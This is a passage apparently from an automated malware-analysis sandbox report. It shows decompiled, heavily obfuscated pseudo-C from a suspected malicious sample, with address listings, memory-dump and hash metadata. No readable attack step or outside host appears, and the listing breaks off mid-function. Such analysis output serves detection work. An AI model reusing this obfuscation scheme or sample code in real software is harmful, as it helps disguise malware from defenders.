                                              												} else {
                                              													__eflags = _t806 - 0x397d406a;
                                              													if(_t806 != 0x397d406a) {
                                              														goto L44;
                                              													} else {
                                              														_t820 =  *(_t950 + 0x118);
                                              														E0022F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
                                              														_t950 = _t950 + 0x10;
                                              														asm("sbb ecx, ecx");
                                              														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
                                              														goto L13;
                                              													}
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              							goto L49;
                                              						}
                                              					}
                                              				}
                                              			}
                                              0x0022a287
                                              0x0022a292
                                              0x0022a29a
                                              0x0022a2a5
                                              0x0022a2b0
                                              0x0022a2bb
                                              0x0022a2c6
                                              0x0022a2db
                                              0x0022a2de
                                              0x0022a2df
                                              0x0022a2e6
                                              0x0022a2f1
                                              0x0022a2fc
                                              0x0022a304
                                              0x0022a30c
                                              0x0022a317
                                              0x0022a32a
                                              0x0022a331
                                              0x0022a33c
                                              0x0022a352
                                              0x0022a359
                                              0x0022a364
                                              0x0022a36f
                                              0x0022a382
                                              0x0022a389
                                              0x0022a394
                                              0x0022a39f
                                              0x0022a3aa
                                              0x0022a3b2
                                              0x0022a3bd
                                              0x0022a3c5
                                              0x0022a3cd
                                              0x0022a3d2
                                              0x0022a3da
                                              0x0022a3e5
                                              0x0022a3f0
                                              0x0022a3fb
                                              0x0022a406
                                              0x0022a411
                                              0x0022a41c
                                              0x0022a427
                                              0x0022a42f
                                              0x0022a434
                                              0x0022a43c
                                              0x0022a444
                                              0x0022a44c
                                              0x0022a460
                                              0x0022a467
                                              0x0022a472
                                              0x0022a47d
                                              0x0022a487
                                              0x0022a492
                                              0x0022a49d
                                              0x0022a4a5
                                              0x0022a4b0
                                              0x0022a4be
                                              0x0022a4c3
                                              0x0022a4ce
                                              0x0022a4d1
                                              0x0022a4d5
                                              0x0022a4da
                                              0x0022a4e2
                                              0x0022a4ea
                                              0x0022a4f2
                                              0x0022a4f7
                                              0x0022a4ff
                                              0x0022a507
                                              0x0022a512
                                              0x0022a51a
                                              0x0022a525
                                              0x0022a530
                                              0x0022a538
                                              0x0022a53d
                                              0x0022a545
                                              0x0022a54d
                                              0x0022a558
                                              0x0022a563
                                              0x0022a56e
                                              0x0022a57e
                                              0x0022a582
                                              0x0022a58a
                                              0x0022a58e
                                              0x0022a596
                                              0x0022a59e
                                              0x0022a5a6
                                              0x0022a5ab
                                              0x0022a5b3
                                              0x0022a5bb
                                              0x0022a5c6
                                              0x0022a5d1
                                              0x0022a5dc
                                              0x0022a5e7
                                              0x0022a5f2
                                              0x0022a5fd
                                              0x0022a609
                                              0x0022a60c
                                              0x0022a610
                                              0x0022a618
                                              0x0022a61d
                                              0x0022a625
                                              0x0022a638
                                              0x0022a63f
                                              0x0022a64a
                                              0x0022a652
                                              0x0022a657
                                              0x0022a65c
                                              0x0022a664
                                              0x0022a66c
                                              0x0022a679
                                              0x0022a67d
                                              0x0022a685
                                              0x0022a68d
                                              0x0022a695
                                              0x0022a6a5
                                              0x0022a6aa
                                              0x0022a6b0
                                              0x0022a6b5
                                              0x0022a6bd
                                              0x0022a6c5
                                              0x0022a6ce
                                              0x0022a6d3
                                              0x0022a6dd
                                              0x0022a6e2
                                              0x0022a6e8
                                              0x0022a6f0
                                              0x0022a6fb
                                              0x0022a706
                                              0x0022a711
                                              0x0022a719
                                              0x0022a71e
                                              0x0022a723
                                              0x0022a72b
                                              0x0022a733
                                              0x0022a73b
                                              0x0022a740
                                              0x0022a748
                                              0x0022a750
                                              0x0022a758
                                              0x0022a75d
                                              0x0022a762
                                              0x0022a76a
                                              0x0022a776
                                              0x0022a77b
                                              0x0022a785
                                              0x0022a78a
                                              0x0022a790
                                              0x0022a798
                                              0x0022a7a0
                                              0x0022a7ab
                                              0x0022a7b6
                                              0x0022a7c1
                                              0x0022a7d3
                                              0x0022a7d8
                                              0x0022a7e9
                                              0x0022a7ea
                                              0x0022a7f1
                                              0x0022a7fc
                                              0x0022a807
                                              0x0022a80f
                                              0x0022a81a
                                              0x0022a825
                                              0x0022a830
                                              0x0022a83b
                                              0x0022a846
                                              0x0022a854
                                              0x0022a858
                                              0x0022a860
                                              0x0022a868
                                              0x0022a872
                                              0x0022a87d
                                              0x0022a888
                                              0x0022a893
                                              0x0022a89b
                                              0x0022a8a0
                                              0x0022a8a5
                                              0x0022a8ad
                                              0x0022a8b5
                                              0x0022a8c0
                                              0x0022a8cb
                                              0x0022a8d6
                                              0x0022a8e1
                                              0x0022a8ec
                                              0x0022a8f7
                                              0x0022a902
                                              0x0022a90d
                                              0x0022a918
                                              0x0022a923
                                              0x0022a92b
                                              0x0022a936
                                              0x0022a941
                                              0x0022a955
                                              0x0022a95a
                                              0x0022a961
                                              0x0022a96c
                                              0x0022a977
                                              0x0022a982
                                              0x0022a989
                                              0x0022a991
                                              0x0022a99c
                                              0x0022a9a4
                                              0x0022a9ac
                                              0x0022a9b1
                                              0x0022a9b9
                                              0x0022a9c9
                                              0x0022a9cf
                                              0x0022a9d7
                                              0x0022a9df
                                              0x0022a9e7
                                              0x0022a9ef
                                              0x0022a9f8
                                              0x0022a9fd
                                              0x0022aa03
                                              0x0022aa0b
                                              0x0022aa1e
                                              0x0022aa1f
                                              0x0022aa26
                                              0x0022aa31
                                              0x0022aa3c
                                              0x0022aa44
                                              0x0022aa4f
                                              0x0022aa5a
                                              0x0022aa65
                                              0x0022aa79
                                              0x0022aa80
                                              0x0022aa92
                                              0x0022aa99
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aaa1
                                              0x0022aaa1
                                              0x0022aaa4
                                              0x0022aaa4
                                              0x0022aaa4
                                              0x0022aaaa
                                              0x00000000
                                              0x00000000
                                              0x0022aab0
                                              0x0022aab0
                                              0x0022adbb
                                              0x0022ae14
                                              0x0022ae19
                                              0x0022ae2d
                                              0x0022ae32
                                              0x0022ae38
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x00000000
                                              0x0022aa9d
                                              0x0022aab6
                                              0x0022aab6
                                              0x0022aabc
                                              0x0022ace5
                                              0x0022aceb
                                              0x0022adaa
                                              0x0022adb1
                                              0x00000000
                                              0x0022acf1
                                              0x0022acf1
                                              0x0022acf7
                                              0x0022ad88
                                              0x0022ad8d
                                              0x00000000
                                              0x0022acfd
                                              0x0022acfd
                                              0x0022ad03
                                              0x00000000
                                              0x0022ad09
                                              0x0022ad10
                                              0x0022ad26
                                              0x0022ad2e
                                              0x0022ad64
                                              0x0022ad69
                                              0x0022ad6e
                                              0x0022ad76
                                              0x00000000
                                              0x0022ad76
                                              0x0022ad03
                                              0x0022acf7
                                              0x0022aac2
                                              0x0022aac2
                                              0x0022acac
                                              0x0022acbb
                                              0x0022acc2
                                              0x0022acc9
                                              0x0022acd1
                                              0x0022acd2
                                              0x0022acda
                                              0x00000000
                                              0x0022aac8
                                              0x0022aace
                                              0x0022ac86
                                              0x0022ac8d
                                              0x00000000
                                              0x0022aad4
                                              0x0022aada
                                              0x0022ac01
                                              0x0022ac02
                                              0x0022ac0b
                                              0x0022ac0d
                                              0x0022ac29
                                              0x0022ac2d
                                              0x0022ac2f
                                              0x0022ac4c
                                              0x0022ac51
                                              0x0022ac54
                                              0x0022ac58
                                              0x0022ac5a
                                              0x0022b013
                                              0x0022b014
                                              0x0022b01b
                                              0x0022b022
                                              0x0022b041
                                              0x0022b041
                                              0x0022ac60
                                              0x0022ac60
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x00000000
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022ac5a
                                              0x0022aae0
                                              0x0022aae6
                                              0x0022abcb
                                              0x0022abcf
                                              0x0022abd2
                                              0x0022abd7
                                              0x0022abde
                                              0x0022abde
                                              0x00000000
                                              0x0022aaec
                                              0x0022aaec
                                              0x0022aaf2
                                              0x0022b006
                                              0x0022b006
                                              0x0022b00c
                                              0x0022abe2
                                              0x0022abe2
                                              0x00000000
                                              0x0022abe2
                                              0x0022aaf8
                                              0x0022aaf8
                                              0x0022ab0b
                                              0x0022ab12
                                              0x0022ab3b
                                              0x0022ab4e
                                              0x0022ab6c
                                              0x0022ab71
                                              0x0022ab85
                                              0x0022ab8a
                                              0x0022ab91
                                              0x0022ab98
                                              0x0022ab9c
                                              0x0022aba0
                                              0x0022aaa1
                                              0x0022aaa4
                                              0x0022aaa4
                                              0x0022aaaa
                                              0x00000000
                                              0x00000000
                                              0x0022aaaa
                                              0x0022aaf2
                                              0x0022aae6
                                              0x0022aada
                                              0x0022aace
                                              0x0022aac2
                                              0x0022aabc
                                              0x0022b04a
                                              0x0022b054
                                              0x0022ae42
                                              0x0022ae42
                                              0x0022ae48
                                              0x0022afef
                                              0x0022aff1
                                              0x0022b001
                                              0x00000000
                                              0x0022aff3
                                              0x0022aff3
                                              0x00000000
                                              0x0022aff3
                                              0x0022ae4e
                                              0x0022ae4e
                                              0x0022ae54
                                              0x0022af59
                                              0x0022af64
                                              0x0022af69
                                              0x0022af69
                                              0x0022af6a
                                              0x0022af94
                                              0x0022af9b
                                              0x0022afa0
                                              0x0022afa3
                                              0x0022afa8
                                              0x0022afa9
                                              0x0022afac
                                              0x0022afaf
                                              0x0022afaf
                                              0x0022afaf
                                              0x0022afb2
                                              0x0022afbb
                                              0x0022afbe
                                              0x0022afc7
                                              0x00000000
                                              0x0022ae5a
                                              0x0022ae5a
                                              0x0022ae60
                                              0x0022af41
                                              0x0022af48
                                              0x00000000
                                              0x0022ae66
                                              0x0022ae66
                                              0x0022ae6c
                                              0x0022af1a
                                              0x0022af21
                                              0x00000000
                                              0x0022ae72
                                              0x0022ae72
                                              0x0022ae78
                                              0x0022aef6
                                              0x0022aefd
                                              0x00000000
                                              0x0022ae7a
                                              0x0022ae7a
                                              0x0022ae80
                                              0x0022b02b
                                              0x0022b02c
                                              0x0022b033
                                              0x0022b03a
                                              0x00000000
                                              0x0022ae86
                                              0x0022ae86
                                              0x0022ae8c
                                              0x00000000
                                              0x0022ae92
                                              0x0022aeb5
                                              0x0022aebd
                                              0x0022aec2
                                              0x0022aec7
                                              0x0022aecf
                                              0x00000000
                                              0x0022aecf
                                              0x0022ae8c
                                              0x0022ae80
                                              0x0022ae78
                                              0x0022ae6c
                                              0x0022ae60
                                              0x0022ae54
                                              0x00000000
                                              0x0022ae48
                                              0x0022aaa4
                                              0x0022aaa1

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
                                              • API String ID: 0-3061497230
                                              • Opcode ID: bf67753877c7dd6c6aeb7e45e1f15ccd9f03751c34dd239ccbd9272cec92a9c9
                                              • Instruction ID: ad6a827ed9eafdbd19fa61ed6eb4897dbeba6c62bc8885261f131cb119005607
                                              • Opcode Fuzzy Hash: bf67753877c7dd6c6aeb7e45e1f15ccd9f03751c34dd239ccbd9272cec92a9c9
                                              • Instruction Fuzzy Hash: 3D82447151C3819BE378CF65C549B9BBBE1BBC4318F10891DE29A862A0CBB58959CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E0022C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                              				char _v4;
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				char _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				char _v28;
                                              				intOrPtr _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				signed int _v128;
                                              				signed int _v132;
                                              				signed int _v136;
                                              				signed int _v140;
                                              				signed int _v144;
                                              				signed int _v148;
                                              				signed int _v152;
                                              				signed int _v156;
                                              				signed int _v160;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				signed int _v172;
                                              				signed int _v176;
                                              				signed int _v180;
                                              				signed int _v184;
                                              				signed int _v188;
                                              				signed int _v192;
                                              				signed int _v196;
                                              				signed int _v200;
                                              				signed int _v204;
                                              				signed int _v208;
                                              				signed int _v212;
                                              				signed int _v216;
                                              				signed int _v220;
                                              				signed int _v224;
                                              				signed int _v228;
                                              				signed int _v232;
                                              				signed int _v236;
                                              				signed int _v240;
                                              				signed int _v244;
                                              				signed int _v248;
                                              				signed int _v252;
                                              				signed int _v256;
                                              				signed int _v260;
                                              				signed int _v264;
                                              				signed int _v268;
                                              				signed int _v272;
                                              				signed int _v276;
                                              				signed int _v280;
                                              				signed int _v284;
                                              				signed int _v288;
                                              				unsigned int _v292;
                                              				signed int _v296;
                                              				signed int _v300;
                                              				signed int _v304;
                                              				signed int _v308;
                                              				signed int _v312;
                                              				intOrPtr _v316;
                                              				char _v320;
                                              				intOrPtr _t666;
                                              				intOrPtr _t667;
                                              				intOrPtr _t672;
                                              				void* _t679;
                                              				intOrPtr _t680;
                                              				intOrPtr _t687;
                                              				intOrPtr _t689;
                                              				intOrPtr _t693;
                                              				intOrPtr* _t694;
                                              				signed int _t706;
                                              				intOrPtr _t707;
                                              				void* _t712;
                                              				intOrPtr _t718;
                                              				void* _t758;
                                              				signed int _t773;
                                              				signed int _t774;
                                              				signed int _t775;
                                              				signed int _t776;
                                              				signed int _t777;
                                              				signed int _t778;
                                              				signed int _t779;
                                              				signed int _t780;
                                              				signed int _t781;
                                              				signed int _t782;
                                              				signed int _t783;
                                              				signed int _t784;
                                              				intOrPtr _t785;
                                              				signed int _t786;
                                              				intOrPtr _t788;
                                              				char _t793;
                                              				void* _t795;
                                              				void* _t797;
                                              
                                              				_t694 = __edx;
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_v20 = __ecx;
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20 & 0x0000ffff);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_a20 & 0x0000ffff);
                                              				_v12 = 0x78501c;
                                              				_v24 = 0;
                                              				_v8 = 0;
                                              				_t793 = 0;
                                              				_v4 = 0;
                                              				_t795 =  &_v320 + 0x30;
                                              				_v232 = 0x7906;
                                              				_t786 = 0xcd25e5e;
                                              				_v232 = _v232 << 6;
                                              				_v232 = _v232 >> 0xa;
                                              				_v232 = _v232 ^ 0x00000790;
                                              				_v156 = 0xf83b;
                                              				_v156 = _v156 >> 0xb;
                                              				_v156 = _v156 ^ 0x0000000c;
                                              				_v52 = 0x2ceb;
                                              				_v52 = _v52 | 0xa5610ac4;
                                              				_v52 = _v52 ^ 0xa5612e27;
                                              				_v208 = 0x96db;
                                              				_v208 = _v208 + 0xffffce2c;
                                              				_v208 = _v208 | 0x71346f29;
                                              				_v208 = _v208 ^ 0x7134ef2f;
                                              				_v116 = 0x28a4;
                                              				_v116 = _v116 + 0xffff342e;
                                              				_v116 = _v116 ^ 0xffff1cd2;
                                              				_v124 = 0xa3bc;
                                              				_v124 = _v124 + 0xffffb3e2;
                                              				_v124 = _v124 ^ 0x0040579e;
                                              				_v132 = 0x4a92;
                                              				_v132 = _v132 << 0xb;
                                              				_v132 = _v132 ^ 0x02509000;
                                              				_v140 = 0xcc93;
                                              				_v140 = _v140 >> 0xd;
                                              				_v140 = _v140 ^ 0x04000006;
                                              				_v148 = 0xadf6;
                                              				_v148 = _v148 >> 5;
                                              				_v148 = _v148 ^ 0x0008056f;
                                              				_v216 = 0xcf16;
                                              				_v216 = _v216 ^ 0x2caffd24;
                                              				_v216 = _v216 >> 8;
                                              				_v216 = _v216 ^ 0x002cad32;
                                              				_v296 = 0xe55e;
                                              				_v296 = _v296 << 0x10;
                                              				_v296 = _v296 + 0xffff79ea;
                                              				_v296 = _v296 << 5;
                                              				_v296 = _v296 ^ 0xabaf3c40;
                                              				_v152 = 0xf9a;
                                              				_v16 = 0;
                                              				_v320 = 0;
                                              				_v152 = _v152 * 0x3f;
                                              				_v152 = _v152 ^ 0x8003d6e6;
                                              				_v120 = 0x15;
                                              				_v120 = _v120 << 2;
                                              				_v120 = _v120 ^ 0x00000054;
                                              				_v144 = 0x2eae;
                                              				_v144 = _v144 + 0x3c19;
                                              				_v144 = _v144 ^ 0x00006ac4;
                                              				_v56 = 0xab01;
                                              				_t773 = 0x5e;
                                              				_v56 = _v56 / _t773;
                                              				_v56 = _v56 ^ 0x00004cb8;
                                              				_v104 = 0x2a8e;
                                              				_t774 = 0x2c;
                                              				_v104 = _v104 / _t774;
                                              				_v104 = _v104 ^ 0x000033ed;
                                              				_v292 = 0xd22b;
                                              				_v292 = _v292 | 0xd3babaa8;
                                              				_t775 = 0x50;
                                              				_v292 = _v292 * 0x6c;
                                              				_v292 = _v292 >> 7;
                                              				_v292 = _v292 ^ 0x00a58d92;
                                              				_v96 = 0x39fa;
                                              				_v96 = _v96 / _t775;
                                              				_v96 = _v96 ^ 0x00002d01;
                                              				_v240 = 0xf5d4;
                                              				_v240 = _v240 ^ 0x5b9fa071;
                                              				_v240 = _v240 >> 3;
                                              				_v240 = _v240 ^ 0x0b73efef;
                                              				_v248 = 0x1311;
                                              				_t776 = 0x42;
                                              				_v248 = _v248 / _t776;
                                              				_v248 = _v248 + 0x5e6d;
                                              				_v248 = _v248 ^ 0x00004acc;
                                              				_v88 = 0x907;
                                              				_t777 = 0x6e;
                                              				_v88 = _v88 * 0x48;
                                              				_v88 = _v88 ^ 0x0002ff0c;
                                              				_v36 = 0x8ec2;
                                              				_v36 = _v36 / _t777;
                                              				_v36 = _v36 ^ 0x00005772;
                                              				_v260 = 0x4792;
                                              				_v260 = _v260 << 0xd;
                                              				_v260 = _v260 >> 0xb;
                                              				_v260 = _v260 >> 4;
                                              				_v260 = _v260 ^ 0x00006a86;
                                              				_v224 = 0x4f89;
                                              				_v224 = _v224 + 0xffff3059;
                                              				_t778 = 0x21;
                                              				_v224 = _v224 * 0x6e;
                                              				_v224 = _v224 ^ 0xffc8e4d3;
                                              				_v48 = 0x8858;
                                              				_v48 = _v48 + 0x804a;
                                              				_v48 = _v48 ^ 0x00017e21;
                                              				_v312 = 0xd58c;
                                              				_v312 = _v312 | 0x45747a0f;
                                              				_v312 = _v312 >> 0xa;
                                              				_v312 = _v312 / _t778;
                                              				_v312 = _v312 ^ 0x00008646;
                                              				_v300 = 0xadcd;
                                              				_v300 = _v300 >> 8;
                                              				_v300 = _v300 << 9;
                                              				_v300 = _v300 >> 1;
                                              				_v300 = _v300 ^ 0x00008fc4;
                                              				_v268 = 0xd742;
                                              				_t779 = 0x30;
                                              				_v268 = _v268 / _t779;
                                              				_v268 = _v268 + 0x61d9;
                                              				_v268 = _v268 >> 4;
                                              				_v268 = _v268 ^ 0x00000191;
                                              				_v204 = 0x8d76;
                                              				_v204 = _v204 | 0x1111a955;
                                              				_v204 = _v204 << 5;
                                              				_v204 = _v204 ^ 0x2235a282;
                                              				_v64 = 0x8939;
                                              				_v64 = _v64 + 0xffff3fc4;
                                              				_v64 = _v64 ^ 0xffff80c7;
                                              				_v276 = 0x72;
                                              				_v276 = _v276 * 0x7d;
                                              				_v276 = _v276 + 0xffff8366;
                                              				_v276 = _v276 >> 9;
                                              				_v276 = _v276 ^ 0x007facee;
                                              				_v44 = 0xf34a;
                                              				_v44 = _v44 + 0xffffbf38;
                                              				_v44 = _v44 ^ 0x00008263;
                                              				_v112 = 0x1dc0;
                                              				_v112 = _v112 ^ 0x2c6551d7;
                                              				_v112 = _v112 ^ 0x2c653ad3;
                                              				_v228 = 0xc596;
                                              				_v228 = _v228 ^ 0x9ca21630;
                                              				_v228 = _v228 ^ 0x8f0fd5bf;
                                              				_v228 = _v228 ^ 0x13ad7fff;
                                              				_v196 = 0x8cfa;
                                              				_v196 = _v196 >> 1;
                                              				_v196 = _v196 ^ 0xfb4b109c;
                                              				_v196 = _v196 ^ 0xfb4b1bca;
                                              				_v236 = 0x2fd6;
                                              				_v236 = _v236 << 7;
                                              				_v236 = _v236 << 2;
                                              				_v236 = _v236 ^ 0x005fedce;
                                              				_v180 = 0x51a5;
                                              				_v180 = _v180 ^ 0x4af0041f;
                                              				_v180 = _v180 + 0xfffff3cf;
                                              				_v180 = _v180 ^ 0x4af05e30;
                                              				_v244 = 0x8950;
                                              				_v244 = _v244 << 0xc;
                                              				_v244 = _v244 | 0xbaabdb8a;
                                              				_v244 = _v244 ^ 0xbabf869d;
                                              				_v40 = 0xc836;
                                              				_v40 = _v40 + 0xffff3474;
                                              				_v40 = _v40 ^ 0xffff8af1;
                                              				_v176 = 0x9727;
                                              				_v176 = _v176 + 0xffffb8fc;
                                              				_v176 = _v176 >> 3;
                                              				_v176 = _v176 ^ 0x00001e80;
                                              				_v304 = 0x64c7;
                                              				_v304 = _v304 + 0x56f7;
                                              				_v304 = _v304 ^ 0x2de137fe;
                                              				_v304 = _v304 + 0xaf99;
                                              				_v304 = _v304 ^ 0x2de22ef8;
                                              				_v308 = 0x2e06;
                                              				_v308 = _v308 | 0x78777a1f;
                                              				_v308 = _v308 * 0x79;
                                              				_v308 = _v308 >> 3;
                                              				_v308 = _v308 ^ 0x1e0f1828;
                                              				_v92 = 0xc9a2;
                                              				_v92 = _v92 | 0xf3c29ea2;
                                              				_v92 = _v92 ^ 0xf3c28d84;
                                              				_v100 = 0xecbf;
                                              				_v100 = _v100 + 0xffff0faf;
                                              				_v100 = _v100 ^ 0xffffc0a5;
                                              				_v192 = 0x95e0;
                                              				_v192 = _v192 << 8;
                                              				_v192 = _v192 << 9;
                                              				_v192 = _v192 ^ 0x2bc00f3b;
                                              				_v200 = 0x7c40;
                                              				_t780 = 0x3a;
                                              				_v200 = _v200 / _t780;
                                              				_v200 = _v200 << 8;
                                              				_v200 = _v200 ^ 0x000244df;
                                              				_v272 = 0x7605;
                                              				_v272 = _v272 << 5;
                                              				_v272 = _v272 + 0xffffdeaf;
                                              				_v272 = _v272 >> 0xb;
                                              				_v272 = _v272 ^ 0x00001482;
                                              				_v108 = 0x1c78;
                                              				_v108 = _v108 + 0x3c33;
                                              				_v108 = _v108 ^ 0x00006c40;
                                              				_v280 = 0xd61a;
                                              				_v280 = _v280 ^ 0xfb8fe6a7;
                                              				_v280 = _v280 + 0x5fc;
                                              				_v280 = _v280 | 0xbad3e440;
                                              				_v280 = _v280 ^ 0xfbdf8156;
                                              				_v288 = 0x89a2;
                                              				_v288 = _v288 + 0xffff4641;
                                              				_v288 = _v288 >> 0xc;
                                              				_v288 = _v288 >> 0xd;
                                              				_v288 = _v288 ^ 0x000071e8;
                                              				_v252 = 0xe21c;
                                              				_v252 = _v252 ^ 0x457ecc8f;
                                              				_t781 = 0x67;
                                              				_v252 = _v252 * 0x59;
                                              				_v252 = _v252 ^ 0x28de7ded;
                                              				_v84 = 0xe1;
                                              				_v84 = _v84 >> 3;
                                              				_v84 = _v84 ^ 0x00001e3a;
                                              				_v184 = 0xbeeb;
                                              				_v184 = _v184 * 0x12;
                                              				_v184 = _v184 + 0x8ae1;
                                              				_v184 = _v184 ^ 0x000de1ad;
                                              				_v68 = 0xfd10;
                                              				_v68 = _v68 >> 0xf;
                                              				_v68 = _v68 ^ 0x000036f7;
                                              				_v76 = 0x1f03;
                                              				_v76 = _v76 * 0x49;
                                              				_v76 = _v76 ^ 0x000897f9;
                                              				_v264 = 0xf0d9;
                                              				_v264 = _v264 * 0x66;
                                              				_v264 = _v264 + 0xffffb5cf;
                                              				_v264 = _v264 + 0xea22;
                                              				_v264 = _v264 ^ 0x0060dcb6;
                                              				_v168 = 0xdfa9;
                                              				_v168 = _v168 ^ 0x7c3d7298;
                                              				_v168 = _v168 ^ 0xd2777362;
                                              				_v168 = _v168 ^ 0xae4ad343;
                                              				_v72 = 0x8534;
                                              				_v72 = _v72 ^ 0x085524ca;
                                              				_v72 = _v72 ^ 0x085595c2;
                                              				_v136 = 0x90f3;
                                              				_v136 = _v136 + 0xcfad;
                                              				_v136 = _v136 ^ 0x00017ab2;
                                              				_v220 = 0x7eee;
                                              				_v220 = _v220 >> 3;
                                              				_v220 = _v220 + 0xffffea23;
                                              				_v220 = _v220 ^ 0xffffcf89;
                                              				_v164 = 0x31cc;
                                              				_v164 = _v164 | 0x82d13576;
                                              				_v164 = _v164 >> 3;
                                              				_v164 = _v164 ^ 0x105a14dc;
                                              				_v284 = 0xab9f;
                                              				_v284 = _v284 / _t781;
                                              				_v284 = _v284 + 0xffff982b;
                                              				_v284 = _v284 + 0xcf45;
                                              				_v284 = _v284 ^ 0x000072b9;
                                              				_v80 = 0x4458;
                                              				_v80 = _v80 + 0xfa7e;
                                              				_v80 = _v80 ^ 0x000168e1;
                                              				_v128 = 0x89b9;
                                              				_v128 = _v128 + 0xe32e;
                                              				_v128 = _v128 ^ 0x00010bac;
                                              				_v172 = 0xe617;
                                              				_v172 = _v172 << 4;
                                              				_v172 = _v172 + 0xb499;
                                              				_v172 = _v172 ^ 0x000f5cd6;
                                              				_v212 = 0x2b1d;
                                              				_v212 = _v212 << 0x10;
                                              				_t782 = 0x21;
                                              				_v212 = _v212 * 0x7f;
                                              				_v212 = _v212 ^ 0x63636a51;
                                              				_v188 = 0x87b6;
                                              				_v188 = _v188 | 0xa87ad713;
                                              				_v188 = _v188 << 3;
                                              				_v188 = _v188 ^ 0x43d6c05c;
                                              				_v60 = 0x1ec0;
                                              				_v60 = _v60 / _t782;
                                              				_v60 = _v60 ^ 0x000042c8;
                                              				_v256 = 0x1798;
                                              				_v256 = _v256 ^ 0x8091dd24;
                                              				_v256 = _v256 | 0xdc47dedf;
                                              				_t783 = 0x19;
                                              				_v256 = _v256 * 0x5d;
                                              				_v256 = _v256 ^ 0x3a6c6c2e;
                                              				_v160 = 0x6f3f;
                                              				_v160 = _v160 / _t783;
                                              				_t784 = 0x73;
                                              				_t785 = _v20;
                                              				_v160 = _v160 / _t784;
                                              				_v160 = _v160 ^ 0x00005ad1;
                                              				while(1) {
                                              					L1:
                                              					_t758 = 0x1fbed331;
                                              					while(1) {
                                              						_t797 = _t786 - _t758;
                                              						if(_t797 <= 0) {
                                              						}
                                              						L3:
                                              						if(_t797 == 0) {
                                              							__eflags = E00225B79(_t785, _v20);
                                              							_t786 = 0x1b724d6a;
                                              							_t679 = 1;
                                              							_t793 =  !=  ? _t679 : _t793;
                                              							L13:
                                              							_t666 = _v316;
                                              							L14:
                                              							_t707 = _v320;
                                              							goto L1;
                                              						}
                                              						if(_t786 == 0xa0d70be) {
                                              							__eflags = _t694;
                                              							if(_t694 == 0) {
                                              								_t718 = 0;
                                              								__eflags = 0;
                                              							} else {
                                              								_t718 =  *_t694;
                                              							}
                                              							__eflags = _t694;
                                              							if(_t694 == 0) {
                                              								_t680 = 0;
                                              								__eflags = 0;
                                              							} else {
                                              								_t680 =  *((intOrPtr*)(_t694 + 4));
                                              							}
                                              							E00238422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
                                              							_t795 = _t795 + 0x1c;
                                              							asm("sbb esi, esi");
                                              							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
                                              							goto L13;
                                              						}
                                              						if(_t786 == 0xcd25e5e) {
                                              							_t786 = 0x25fbc0d1;
                                              							while(1) {
                                              								_t797 = _t786 - _t758;
                                              								if(_t797 <= 0) {
                                              								}
                                              								goto L25;
                                              							}
                                              							goto L3;
                                              						}
                                              						if(_t786 == 0xdfc12f5) {
                                              							_t666 = E00237955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
                                              							_t795 = _t795 + 0x34;
                                              							_v316 = _t666;
                                              							__eflags = _t666;
                                              							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
                                              							goto L14;
                                              						}
                                              						if(_t786 == 0x1b724d6a) {
                                              							E00227925(_v284, _t785, _v80, _v128);
                                              							_t786 = 0x2cd2473d;
                                              							L12:
                                              							goto L13;
                                              						}
                                              						if(_t786 != 0x1e7ff602) {
                                              							L45:
                                              							__eflags = _t786 - 0x258a7eda;
                                              							if(_t786 == 0x258a7eda) {
                                              								L10:
                                              								return _t793;
                                              							}
                                              							_t666 = _v316;
                                              							continue;
                                              						}
                                              						E00227925(_v60, _v32, _v256, _v160);
                                              						goto L10;
                                              						L25:
                                              						__eflags = _t786 - 0x20246154;
                                              						if(_t786 == 0x20246154) {
                                              							__eflags = _t694;
                                              							if(__eflags == 0) {
                                              								_t787 = _v16;
                                              							} else {
                                              								_push(_v308);
                                              								_t667 = E0023889D(0x23c850, _v304, __eflags);
                                              								_t787 = _t667;
                                              								_v16 = _t667;
                                              							}
